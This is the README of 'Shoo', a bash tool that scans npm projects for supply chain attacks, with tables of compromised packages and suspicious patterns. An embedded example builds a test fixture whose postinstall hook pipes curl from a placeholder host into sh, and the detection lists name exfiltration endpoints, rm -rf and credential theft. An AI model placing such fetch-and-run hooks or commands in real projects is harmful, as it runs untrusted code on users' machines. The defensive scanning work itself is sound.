npm supply chain attack scanner. Detects nx/Singularity, debug/chalk, DuckDB, Shai-Hulud malware, exfiltration endpoints, and suspicious install scripts.
Shoo 👻

License: MIT

Fast, offline-first npm supply chain attack scanner. Single bash script, zero dependencies.

Checks your lockfiles, source files, and system for compromised packages, malware, and suspicious patterns.

Why Shoo?

npm supply chain attacks are increasing. Shoo detects compromised package versions, malware files, exfiltration endpoints, and suspicious install scripts.

Attack         | Packages                             | Impact
---------------|--------------------------------------|----------------------
nx/Singularity | nx@20.9.0-21.8.0                     | Millions of downloads
debug/chalk    | debug@4.4.2, chalk@5.6.1             | Billions of downloads
DuckDB         | duckdb@1.3.3, @duckdb/node-api@1.3.3 | Data exfiltration
Shai-Hulud     | Malware files, workflow tampering    | Targeted orgs

  • Fast — runs in milliseconds, single bash script, zero dependencies
  • Works offline — no network required, fetches updates when available
  • Context-aware — ignores test files and build artifacts, reduces false positives
  • Beyond npm audit — checks VS Code extensions, shell configs, GitHub workflows

Installation

# Download
curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
chmod +x shoo

# Or clone
git clone https://github.com/jplansink/shoo.git

Requirements

  • Bash 4.0+
  • Optional: curl or wget for online malware database

Example

$ ./shoo

Shoo 👻 .

Total: 2 (critical: 1, high: 1)

CRITICAL
  ✗ Compromised version: nx@21.5.0 (nx/Singularity) [CWE-506]
    package-lock.json
    https://cwe.mitre.org/data/definitions/506.html
    → Remove package, clean reinstall, rotate credentials

HIGH
  ✗ Suspicious postinstall script (curl/wget/eval) [CWE-94]
    node_modules/sketchy-pkg/package.json
    https://cwe.mitre.org/data/definitions/94.html
    → Review script contents before running npm install

Usage

./shoo                # Scan current directory
./shoo ~/projects     # Scan specific directory
./shoo --all          # Scan directory + system
./shoo --system       # Scan system only
./shoo -q             # Quiet (exit code only)
./shoo --json         # JSON output
./shoo --sarif        # SARIF output (GitHub Security)
./shoo --offline      # Skip online databases

Exit codes: 0 clean, 1 critical, 2 high, 3 medium

What It Scans

Location           | What It Checks
-------------------|------------------------------------------
Lockfiles          | Compromised package versions
Source files       | Malware patterns, exfiltration endpoints
package.json       | Suspicious install scripts
GitHub workflows   | Malicious actions, encoded payloads
VS Code extensions | Unicode malware
npm cache          | Cached malware files
Shell configs      | Tampering (.bashrc, .zshrc)
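To make the lockfile and package.json rows of this table concrete, here is a constructed bash sketch of the two checks with the exit-code convention from the Usage section (0 clean, 1 critical, 2 high). It is an added example, not shoo's own code; the regexes, the fixture files and the function names are assumptions, and the compromised versions are the ones listed in this README.

```bash
#!/usr/bin/env bash
# Constructed illustration (not shoo's own code) of two checks the README
# describes: compromised versions in package-lock.json and curl/wget/eval in
# install hooks, mapped onto shoo's exit codes (0 clean, 1 critical, 2 high).
set -u
# name|version pairs taken from the README's "Known Attacks" table
COMPROMISED="debug|4.4.2
chalk|5.6.1
duckdb|1.3.3
@duckdb/node-api|1.3.3"
# Lockfile v2/v3 entries look like "node_modules/<name>": {"version": "<v>", ...};
# the file is flattened so one regex can span an entry. Returns 1 on any hit.
scan_lockfile() {
  local lock="$1" flat hits=0 name ver
  flat=$(tr -d '\n' < "$lock")
  while IFS='|' read -r name ver; do
    if printf '%s' "$flat" | grep -Eq \
        "\"node_modules/([^\"]*/)?${name}\" *: *\{[^}]*\"version\" *: *\"${ver}\""; then
      echo "CRITICAL compromised version: ${name}@${ver} ($lock)"
      hits=$((hits + 1))
    fi
  done <<< "$COMPROMISED"
  [ "$hits" -eq 0 ]
}

# Install hooks that download or eval code at install time. Returns 1 on a hit.
scan_install_scripts() {
  local pkg="$1"
  if tr -d '\n' < "$pkg" | grep -Eo '"(pre|post)?install" *: *"[^"]*"' \
        | grep -Eq '(^|[^a-z])(curl|wget|eval)([^a-z]|$)'; then
    echo "HIGH suspicious install script: $pkg"
    return 1
  fi
}

# Verdict for a project directory; the more severe finding wins.
scan_project() {
  local dir="$1"
  if [ -f "$dir/package-lock.json" ] && ! scan_lockfile "$dir/package-lock.json"; then return 1; fi
  if [ -f "$dir/package.json" ] && ! scan_install_scripts "$dir/package.json"; then return 2; fi
  return 0
}

# Constructed fixture: lockfile pinning chalk@5.6.1 and a curl-piped-to-sh postinstall; prints the directory.
make_fixture() {
  local dir; dir=$(mktemp -d)
  printf '{"lockfileVersion":3,"packages":{"node_modules/chalk":{"version":"5.6.1"}}}\n' > "$dir/package-lock.json"
  printf '{"scripts":{"postinstall":"curl -s https://example.invalid/x | sh"}}\n' > "$dir/package.json"
  echo "$dir"
}
```

The version regex treats `.` as a wildcard and the hook regex only looks at one `install` string per file, which is enough to show the mechanism but not a substitute for the scanner's own pattern set.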

Tip

Use --system to scan global packages and VS Code extensions without a project.

What It Detects

Known Attacks

Attack            | Packages
------------------|-----------------------------------------------
nx/Singularity    | nx@20.9.0-21.8.0
debug/chalk       | debug@4.4.2, chalk@5.6.1 + 16 more
DuckDB            | duckdb@1.3.3, @duckdb/node-api@1.3.3
Shai-Hulud 2.0    | posthog-js, @asyncapi/specs, @ensdomains/ensjs
XRP               | xrpl@4.2.1-4.2.4, @2.14.2
React Native Aria | 16 compromised packages

Plus 1000+ packages from aikido.dev online database (cached 24h).

Suspicious Patterns

Pattern                  | Examples
-------------------------|-------------------------------------------------------
Malware files            | setup_bun.js, bun_environment.js
Exfiltration endpoints   | webhook.site, pastebin.com
Hardcoded secrets        | AWS keys, GitHub/npm tokens, private keys
Obfuscated payloads      | Base64 blobs, hex encoding, suspicious minification
Destructive code         | rm -rf, recursive rmSync
Suspicious postinstall   | curl/wget/eval in scripts
Unicode obfuscation      | Hidden homoglyph characters
Malicious workflows      | Encoded payloads, bad runners
Shell config tampering   | .bashrc, .zshrc modifications
npm audit CVEs           | Known vulnerabilities in dependencies
Targeted org typosquatting | @asyncapi, @posthog, @zapier

Supported Lockfiles

package-lock.json · yarn.lock · pnpm-lock.yaml

CI/CD

- name: Security scan
  run: |
    curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
    chmod +x shoo
    ./shoo -q || exit 1

GitHub Security Tab

- name: Security scan (SARIF)
  run: |
    curl -sO https://raw.githubusercontent.com/jplansink/shoo/main/shoo
    chmod +x shoo
    ./shoo --sarif > results.sarif || true
- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Excluding Files

Create .shooignore in your project:

test/fixtures/
malware-samples/

Credits

Contributing

See CONTRIBUTING.md for guidelines on adding new detections.

Changelog

See CHANGELOG.md for version history.

License

MIT
